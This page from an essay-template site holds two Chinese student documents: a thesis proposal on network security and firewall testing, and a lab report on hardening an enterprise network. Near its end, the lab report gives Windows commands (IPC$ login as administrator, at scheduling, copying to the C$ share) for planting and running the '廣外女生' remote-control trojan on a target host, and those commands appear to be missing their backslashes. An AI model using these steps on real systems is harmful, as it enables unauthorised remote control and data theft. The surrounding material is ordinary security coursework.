千文網(wǎng)小編為你整理了多篇相關(guān)的《企業(yè)網(wǎng)絡(luò)信息安全防御研究開題報(bào)告(范文二篇)》，但愿對你工作學(xué)習(xí)有幫助，當(dāng)然你在千文網(wǎng)還可以找到更多《企業(yè)網(wǎng)絡(luò)信息安全防御研究開題報(bào)告(范文二篇)》。

第一篇：網(wǎng)絡(luò)信息的安全與防范論文開題報(bào)告

網(wǎng)絡(luò)信息的安全與防范

201103級 計(jì)算機(jī)科學(xué)與技術(shù) 金昌電大 王維晶

一、研究的背景及意義

網(wǎng)絡(luò)是信息傳輸、接收、共享的虛擬平臺，通過它把各個點(diǎn)、面、體的信息聯(lián)系到一起，從而實(shí)現(xiàn)這些資源的共享。它是人們信息交流、使用的一個工具。隨著計(jì)算機(jī)網(wǎng)絡(luò)的出現(xiàn)和互聯(lián)網(wǎng)的飛速發(fā)展，企業(yè)基于網(wǎng)絡(luò)的計(jì)算機(jī)應(yīng)用也在迅速增加，基于網(wǎng)絡(luò)信息系統(tǒng)給企業(yè)的經(jīng)營管理帶來了更大的經(jīng)濟(jì)效益，但隨之而來的安全問題也在困擾著用戶。近幾年，木馬、蠕蟲的傳播使企業(yè)的信息安全狀況進(jìn)一步惡化。這都對企業(yè)信息安全提出了更高的要求。防火墻技術(shù)是近幾年發(fā)展起來的一種保護(hù)計(jì)算機(jī)網(wǎng)絡(luò)安全的技術(shù)性措施，它實(shí)際上是一種訪問控制技術(shù)，在某個機(jī)構(gòu)的網(wǎng)絡(luò)和不安全的網(wǎng)絡(luò)之間設(shè)置障礙，阻止對信息資源的非法訪問，也可以使用它阻止保密信息從受保護(hù)網(wǎng)絡(luò)上被非法輸出。

二、研究方法

（一）針對網(wǎng)絡(luò)安全的威脅進(jìn)行歸納，威脅主要來源于以下幾個方面：

1、網(wǎng)絡(luò)黑客的攻擊。黑客們使用各種工具入侵計(jì)算機(jī)系統(tǒng)，竊取重要信息或破壞網(wǎng)絡(luò)的正常使用，嚴(yán)重的情況下，還可能會導(dǎo)致網(wǎng)絡(luò)癱瘓。

2、網(wǎng)絡(luò)病毒的入侵。計(jì)算機(jī)病毒自出現(xiàn)以來，增長速度驚人，所造成的損失也是不計(jì)其數(shù)，一旦感染病毒，輕者程序變慢，重者可能造成硬件損壞。此外，木馬、流氓軟件也對電腦構(gòu)成了很大的威脅。

3、企業(yè)防范不到位。由于網(wǎng)絡(luò)涉及企業(yè)生產(chǎn)經(jīng)營的許多環(huán)節(jié)，整個網(wǎng)絡(luò)要運(yùn)行很多業(yè)務(wù)，因此不可避免地有會來自多方面的攻擊。

4、信息傳輸中的隱患。信息在從源端到目的端傳輸過程中不可避免地要造成一定的信息損耗，或者可能被其他人竊取或修改，破壞了信息的完整性。

5、操作系統(tǒng)和網(wǎng)絡(luò)協(xié)議自身的缺陷。操作系統(tǒng)本身就存在一定的漏洞，導(dǎo)致非法用戶未經(jīng)授權(quán)而獲得訪問權(quán)限或提高其訪問權(quán)限。由于歷史原因，有些網(wǎng)絡(luò)協(xié)議在設(shè)計(jì)時就存在缺陷，比如我們常見的TCP/IP 協(xié)議簇，就沒有解決好協(xié)議的安全問題。

6、內(nèi)部攻擊。由于對企業(yè)內(nèi)部的防范不到位，企業(yè)內(nèi)部員工有意的攻擊或無意的誤操作也是網(wǎng)絡(luò)安全問題的隱患。

7、網(wǎng)絡(luò)設(shè)備的威脅。

（二）應(yīng)該了解網(wǎng)絡(luò)安全，做好防范措施，做好網(wǎng)絡(luò)信息的保密性、完整性和可用性。然后具體講述網(wǎng)絡(luò)防火墻安全技術(shù)的分類及其主要技術(shù)特征，防火墻部署原則，并從防火墻部署的位置詳細(xì)闡述防火墻的選擇標(biāo)準(zhǔn)。

1、防火墻測試方法分類

從產(chǎn)品測試的測試技術(shù)上分類，防火墻測試可分為兩類,一類是從防火墻設(shè)計(jì)的角度著手的白盒測試，另一類是從防火墻使用的角度著手的黑盒測試。

（1）防火墻的白盒測試。以設(shè)計(jì)為主要觀點(diǎn)的白盒測試，通常強(qiáng)調(diào)防火墻系統(tǒng)的整體設(shè)計(jì)。一個正式的防火墻產(chǎn)品首先應(yīng)該經(jīng)過全面的、詳細(xì)的白盒測試，并且出具完整的測試報(bào)告。由于白盒測試要求評測人員必須對防火墻的設(shè)計(jì)原理及其實(shí)現(xiàn)細(xì)節(jié)有深入的了解，決定了該測試通常只能由生產(chǎn)防火墻的廠商進(jìn)行這樣的測試缺乏應(yīng)有的透明性和公正性。

（2）防火墻的黑盒測試。以使用為主要觀點(diǎn)的黑盒測試則不管防火墻內(nèi)部系統(tǒng)設(shè)計(jì)只試圖以使用者的角度從外部對防火墻進(jìn)行攻擊，測試防火墻是否能將非法闖入的測試數(shù)據(jù)包阻擋在外。黑盒測試不要求評測人員對防火墻的細(xì)節(jié)有深入的了解，只需確定測試的目的，將待測目標(biāo)網(wǎng)絡(luò)的信息資料收集齊全，再列出測試的清單，根據(jù)清單逐項(xiàng)測試即可。該測試可確認(rèn)防火墻系統(tǒng)安裝和配置的正確性，并偵測出防火墻是否能防御已知的安全漏洞是當(dāng)前較為通用的手段。



2、現(xiàn)有的防火墻測試方法（1）實(shí)用方法

滲透測試是一種針對防火墻安全性的測試手段，它通過構(gòu)造網(wǎng)絡(luò)環(huán)境，以攻擊者的身份對防火墻進(jìn)行滲透并根據(jù)滲透的難易程度評價防火墻的安全性能。該方法是目前使用最廣泛的一種防火墻測試方法。

（2）理論方法

提出了一種基于形式化模型的防火墻測試方法，該方法首先分別對防火墻系統(tǒng)的網(wǎng)絡(luò)環(huán)境和安全需求進(jìn)行建模，然后形式化驗(yàn)證該防火墻系統(tǒng)是否具有某些安全特性，并根據(jù)安全需求生成測試?yán)髨?zhí)行測試。

以上兩種方法都屬于脫機(jī)測試，是借助于靜態(tài)信息進(jìn)行的測試，在測試中并沒有向?qū)嶋H的網(wǎng)絡(luò)發(fā)送任何的數(shù)據(jù)包。由于是基于模型進(jìn)行測試，而模型只是對真實(shí)情況的模擬不能完全反映真實(shí)情況。因此存在未考慮到測試中的一些關(guān)鍵因素的情況。

三、論文提綱

（一）緒論 引言

（二）分析當(dāng)前網(wǎng)絡(luò)安全形勢 1.闡述網(wǎng)絡(luò)安全的必要 2.網(wǎng)絡(luò)的安全管理

（三）網(wǎng)絡(luò)拓樸結(jié)構(gòu)的安全設(shè)計(jì) 1.網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)分析 2.網(wǎng)絡(luò)攻擊淺析

（四）采用硬軟件防火墻進(jìn)行網(wǎng)絡(luò)信息安全防范 1.防火墻技術(shù) 2.數(shù)據(jù)加密技術(shù) 3.計(jì)算機(jī)病毒的防范

（五）總結(jié)

四、論文的寫作計(jì)劃

（一）2012年12月20日至2013年1月4日提交開題報(bào)告

（二）2013年1月5日至2013年3月5日提交論文初稿

（三）2013年3月6日至2013年3月20日提交論文定稿

（四）2013年3月21日至2013年4月8日提交論文終稿

五、主要參考文獻(xiàn)

[1]謝希仁 計(jì)算機(jī)網(wǎng)絡(luò)第五版 高等教育出版社 2002 [2]吳沖 計(jì)算機(jī)網(wǎng)絡(luò) 清華大學(xué)出版2005 [3]程龍 馬婷 企業(yè)網(wǎng)絡(luò)安全解決方案[J] 科技風(fēng) 2009 [4]石亦歌 企業(yè)網(wǎng)絡(luò)安全解決方案[J] 安防科技 2003 [5]雷震甲 網(wǎng)絡(luò)工程師教程 北京 清華大學(xué)出版社 2009

第二篇：企業(yè)網(wǎng)絡(luò)網(wǎng)絡(luò)信息安全報(bào)告

XX中型企業(yè)網(wǎng)安全 網(wǎng)絡(luò)信息安全報(bào)告

一、實(shí)驗(yàn)?zāi)康募耙?/p>

該專周的目標(biāo)是讓學(xué)生掌握網(wǎng)絡(luò)安全的基本框架，網(wǎng)絡(luò)安全的基本理論。以及了解計(jì)算機(jī)網(wǎng)絡(luò)安全方面的管理、配置和維護(hù)。

本課程要求在理論教學(xué)上以必需夠用為原則，應(yīng)盡量避免過深過繁的理論探討，重在理解網(wǎng)絡(luò)安全的基本框架，網(wǎng)絡(luò)安全的基本理論。掌握數(shù)據(jù)加密、防火墻技術(shù)、入侵檢測技術(shù)以及學(xué)習(xí)網(wǎng)絡(luò)病毒防治。了解Windows 2000的安全、Web的安全、網(wǎng)絡(luò)安全工程以及黑客常用的系統(tǒng)攻擊方法。本課程要求學(xué)生對計(jì)算機(jī)的使用有一定了解（了解Windows的使用，具有鍵盤操作和文件處理的基礎(chǔ)），并已經(jīng)掌握計(jì)算機(jī)網(wǎng)絡(luò)的基本原理。

二、專周內(nèi)容

1、安全需求分析

（1）網(wǎng)絡(luò)安全問題主要集中在對服務(wù)器的安全保護(hù)、防黑客和病毒、重要網(wǎng)段的保護(hù)及管理安全上。因此，我們必須采取相應(yīng)的安全措施杜絕安全隱患，其中應(yīng)該做到：

A、公開服務(wù)器的安全保護(hù) B、防止黑客從外部攻擊 C、入侵檢測與監(jiān)控 D、病毒防護(hù) E、數(shù)據(jù)安全保護(hù) F、網(wǎng)絡(luò)的安全管理

（2）解決網(wǎng)絡(luò)安全問題的一些要求

A、大幅度地提高系統(tǒng)的安全性（重點(diǎn)是可用性和可控性）；

B、保持網(wǎng)絡(luò)原有的特點(diǎn)，即對網(wǎng)絡(luò)的協(xié)議和傳輸具有良好的透明性，能透明接入，無需更改網(wǎng)絡(luò)設(shè)置；

C、易于操作、維護(hù)，并便于自動化管理，而不增加或少增加附加操作；

D、盡量不影響原網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)，同時便于系統(tǒng)及系統(tǒng)功能的擴(kuò)展；

E、安全保密系統(tǒng)具有較好的性能價格比。一次性投資，可以長期使用；

F、安全產(chǎn)品具有合法性，及經(jīng)過國家有關(guān)管理部門的認(rèn)可或認(rèn)證；

（3）系統(tǒng)安全目標(biāo)

A、建立一套完整可行的網(wǎng)絡(luò)安全與網(wǎng)絡(luò)管理策略；

B、將內(nèi)部網(wǎng)絡(luò)、公開服務(wù)器網(wǎng)絡(luò)和外網(wǎng)進(jìn)行有效隔離，避免與外部網(wǎng)絡(luò)直接通信；

C、建立網(wǎng)站各主機(jī)和服務(wù)器的安全保護(hù)措施，保證他們的系統(tǒng)安全；

D、加強(qiáng)合法用戶的訪問認(rèn)證，同時將用戶的訪問權(quán)限控制在最低限度；

E、全面監(jiān)視對公開服務(wù)器的訪問，及時發(fā)現(xiàn)和拒絕不安全的操作和黑客攻擊行為；

F、加強(qiáng)對各種訪問的審計(jì)工作，詳細(xì)記錄對網(wǎng)絡(luò)、公開服務(wù)器的訪問行為，形成完整的系統(tǒng)日志；

2、網(wǎng)絡(luò)拓?fù)?/p>

3、網(wǎng)絡(luò)安全的基本內(nèi)容

（1）基本網(wǎng)絡(luò)命令

A、ping命令： ping –t IP，向指定的計(jì)算機(jī)不停的發(fā)送數(shù)據(jù)包，按Ctr+Break快捷鍵可以查看統(tǒng)計(jì)信息并繼續(xù)運(yùn)行，按 Ctr+C可中止運(yùn)行。

B、Tracert命令：tracert IP 顯示從本地計(jì)算機(jī)到目標(biāo)服務(wù)器所經(jīng)過的計(jì)算機(jī)：

C、pathping pop.pcpop.com 除了顯示路由外，還提供325S的分析，計(jì)算丟失包的%

（2）操作系統(tǒng)安全

A、屏蔽不需要的服務(wù)組件

開始——程序——管理工具——服務(wù) 出現(xiàn)以下窗口：

然后在該對話框中選中需要屏蔽的程序，并單擊右鍵，然后選擇“停止”命令，同時將“啟動類型”設(shè)置為“手動”或“已禁用”，這樣就可以對指定的服務(wù)組進(jìn)行屏蔽了。B、關(guān)閉默認(rèn)共享：“開始”——“程序”——“管理工具”——“服務(wù)”——“Server”

（3）數(shù)據(jù)庫系統(tǒng)安全

A、使用安全的帳號策略和Windows認(rèn)證模式

由于SQL Server不能更改sa用戶名稱，也不能刪除這個超級用戶，所以，我們必須對這個帳號進(jìn)行最強(qiáng)的保護(hù)，當(dāng)然，包括使用一個非常強(qiáng)壯的密碼，最好不要在數(shù)據(jù)庫應(yīng)用中使用sa帳號，只有當(dāng)沒有其它方法登錄到 SQL Server 實(shí)例(例如，當(dāng)其它系統(tǒng)管理員不可用或忘記了密碼)時才使用 sa?？梢孕陆⒁粋€擁有與sa一樣權(quán)限的超級用戶來管理數(shù)據(jù)庫。安全的帳號策略還包括不要讓管理員權(quán)限的帳號泛濫。

SQL Server的認(rèn)證模式有Windows身份認(rèn)證和混合身份認(rèn)證兩種。在任何可能的時候，應(yīng)該對指向SQL Server的連接要求Windows身份驗(yàn)證模式。

Windows認(rèn)證模式比混合模式更優(yōu)越，原因在以下：

1)它通過限制對Microsoft Windows用戶和域用戶帳戶的連接，保護(hù)SQL Server免受大部分Internet工具的侵害。

2)服務(wù)器將從Windows安全增強(qiáng)機(jī)制中獲益，例如更強(qiáng)的身份驗(yàn)證協(xié)議以及強(qiáng)制的密碼復(fù)雜性和過期時間。

3)使用Windows認(rèn)證，不需要將密碼存放在連接字符串中。存儲密碼是使用標(biāo)準(zhǔn)SQL Server登錄的應(yīng)用程序的主要漏洞之一。

4)Windows認(rèn)證意味著你只需要將密碼存放在一個地方。

要在SQL Server的Enterprise Manager安裝Windows身份驗(yàn)證模式，步驟操作： 展開服務(wù)器組——右鍵點(diǎn)擊服務(wù)器——然后點(diǎn)擊“屬性”——在安全性選項(xiàng)卡的身份驗(yàn)證中——點(diǎn)擊“僅限Windows”。（4）網(wǎng)絡(luò)防火墻工具：紅墻主機(jī)網(wǎng)絡(luò)防火墻 安裝

1.具體操作如下：

第一步： 將“愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻”的安裝光盤插入驅(qū)動器，運(yùn)行根目錄下的Setup文件來運(yùn)行其安裝程序，進(jìn)入“愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻安裝”窗口；

第二步：

在“歡迎安裝愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻”對話框中，單擊“下一步”按鈕；

第三步： 在“軟件許可協(xié)議”對話框，接受協(xié)議點(diǎn)擊“是”；

第四步： 點(diǎn)擊“是”按鈕，出現(xiàn)顯示您計(jì)算機(jī)的相關(guān)信息，即判斷是否可以安裝本軟件；

第五步： 單擊“下一步”按鈕，出現(xiàn)“選擇目標(biāo)位置”對話框；

第六步： 在該對話框中，單擊“瀏覽”按鈕，并在“選擇文件夾”對話框中選擇盤符作為驅(qū)動器，再指定相應(yīng)的文件夾及路徑，然后單擊“確定”按鈕；

第七步： 單擊“下一步”按鈕，出現(xiàn)“選擇安裝程序名稱”對話框，您可自定義程序名稱；

第八步： 單擊“下一步”按鈕，系統(tǒng)開始復(fù)制文件；

第九步： 進(jìn)入“紅墻主機(jī)網(wǎng)絡(luò)防火墻配置”窗口，作出是否運(yùn)行“紅墻應(yīng)用程序掃描系統(tǒng)”的選擇后，點(diǎn)擊“完成”。

相關(guān)設(shè)置：告警設(shè)置：系統(tǒng)提供了兩種情況下的告警，即需要系統(tǒng)告警和不需要系統(tǒng)告警，您可據(jù)需要選取告警設(shè)置。

點(diǎn)擊主界面中的“規(guī)則管理”按鈕，彈出相應(yīng)窗口，如下圖：

網(wǎng)絡(luò)監(jiān)控中心：

（5）網(wǎng)絡(luò)攻擊工具：“廣外女生”

它的基本功能有：文件管理方面有上傳，下載，刪除，改名，設(shè)置屬性，建立文件夾和運(yùn)行指定文件等功能；注冊表操作方面：全面模擬WINDOWS的注冊表編輯器，讓遠(yuǎn)程注冊表編輯工作有如在本機(jī)上操作一樣方便；屏幕控制方面：可以自定義圖片的質(zhì)量來減少傳輸?shù)臅r間，在局域網(wǎng)或高網(wǎng)速的地方還可以全屏操作對方的鼠標(biāo)及鍵盤，就像操縱自己的計(jì)算機(jī)一樣；遠(yuǎn)程任務(wù)管理方面，可以直觀地瀏覽對方窗體，隨意殺掉對方窗體或其中的控件；其他功能還有郵件IP通知等。

主要步驟：首先運(yùn)行“gwg.exe”，出現(xiàn)如圖窗口：

選中“服務(wù)端設(shè)置”，生成“GDUFS.exe”木馬：

然后將“GDUFS.exe”復(fù)制到自己的C盤中，再根據(jù)一些命令把“GDUFS.exe”復(fù)制到目標(biāo)主機(jī)的盤中，再進(jìn)行運(yùn)行。目標(biāo)主機(jī)的IP：191.168.12.38 具體步驟及命令：

“開始”——“運(yùn)行”——“cmd”

命令：net use 191.168.12.38ipc$ 123 /user:administrator 與目標(biāo)主機(jī)之間建立聯(lián)系

命令：net time 191.168.12.38 獲取目標(biāo)主機(jī)的時間

命令：at 191.168.12.38 08:21 net share c$=c: 與目標(biāo)主機(jī)的C盤建立通道

命令：copy c:GDUFS.exe 191.168.12.38c$ 復(fù)制“GDUFS.exe”文件到目標(biāo)主機(jī)的C盤中：

命令：191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目標(biāo)主機(jī)中什么時候運(yùn)行。

三、專周小結(jié)：

通過這次網(wǎng)絡(luò)安全專周，我不僅僅是學(xué)到了很多知識，更是透徹的理解到了網(wǎng)絡(luò)安全對生活已經(jīng)將來工作的意義。

網(wǎng)絡(luò)安全分為軟件網(wǎng)絡(luò)安全和硬件網(wǎng)絡(luò)安全。一般我們說的網(wǎng)絡(luò)安全就是軟件上的網(wǎng)絡(luò)安全，即局域網(wǎng)，互聯(lián)網(wǎng)安全。

網(wǎng)絡(luò)安全又分為內(nèi)網(wǎng)安全和外網(wǎng)安全。在內(nèi)外網(wǎng)安全中，內(nèi)網(wǎng)安全則是重中之重。畢竟是家賊難防。據(jù)不完全統(tǒng)計(jì)，全國因?yàn)閮?nèi)網(wǎng)安全的問題，至少每年算是幾億美元。所以，網(wǎng)絡(luò)安全特別重要。

至于在將來的工作中，我們也要嚴(yán)格尊市網(wǎng)絡(luò)設(shè)備管理原則和使用秩序，對設(shè)備進(jìn)行統(tǒng)一管理專人負(fù)責(zé)，嚴(yán)格要求自己對設(shè)備進(jìn)行安全操作，保持強(qiáng)烈的責(zé)任感和服務(wù)意識，做好每一個細(xì)節(jié)，重點(diǎn)做好以下幾項(xiàng)工作：

1，及時準(zhǔn)確判斷網(wǎng)絡(luò)故障，做好上門維護(hù)工作或及時提醒網(wǎng)絡(luò)合作商進(jìn)行維護(hù)。

2，定期檢查維護(hù)各網(wǎng)絡(luò)設(shè)備的運(yùn)行情況并進(jìn)行維護(hù)。3，不定期對服務(wù)器進(jìn)行更新和檢查。

4，遇到特殊情況，及時向領(lǐng)導(dǎo)和老師匯報(bào)，努力提高應(yīng)急處理問題和獨(dú)立處理問題的能力。

感謝老師對我們的教導(dǎo)。